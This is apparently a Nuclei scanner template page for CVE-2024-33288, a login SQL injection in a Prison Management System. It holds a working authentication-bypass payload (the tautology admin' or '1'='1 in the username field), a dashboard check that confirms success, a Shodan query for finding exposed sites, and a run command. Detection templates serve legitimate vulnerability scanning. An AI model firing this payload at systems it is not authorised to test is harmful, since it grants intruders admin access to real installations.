Prison Management System - SQL Injection Authentication Bypass
ID: CVE-2024-33288
Severity: high
Author: s4e-io
Tags: cve,cve2024,cms,sqli
Description
An SQL injection vulnerability was found on the login page of Prison Management System.
YAML Source
id: CVE-2024-33288

info:
  name: Prison Management System - SQL Injection Authentication Bypass
  author: s4e-io
  severity: high
  description: |
    Sql injection vulnerability was found on the login page in Prison Management System
  reference:
    - https://en.0day.today/exploit/39610
    - https://www.sourcecodester.com/sql/17287/prison-management-system.html
  classification:
    cpe: cpe:2.3:a:prison_management_system_project:prison_management_system:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: prison_management_system_project
    product: prison_management_system
    shodan-query: title:"Prison Management System"
  tags: cve,cve2024,cms,sqli

http:
  - raw:
      - |
        POST /Admin/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        txtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin=

      - |
        GET /Admin/index.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<p>Change Password</p>"
          - "<p>Logout</p>"
          - "Admin Dashboard | Prison Management system"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100c019f80114790b492d01887238b91e3a76be532014761cecf1db4031531ef956022100804e12aab7437b3605df406487ab6d917c25c9a0fac28e3f2faba312d0f29a73:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This Nuclei template checks for the vulnerability by sending the login request with the tautology in txtusername, then requesting /Admin/index.php and matching the admin-dashboard markers with a 200 status. Run it against a target URL with:
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-33288.yaml"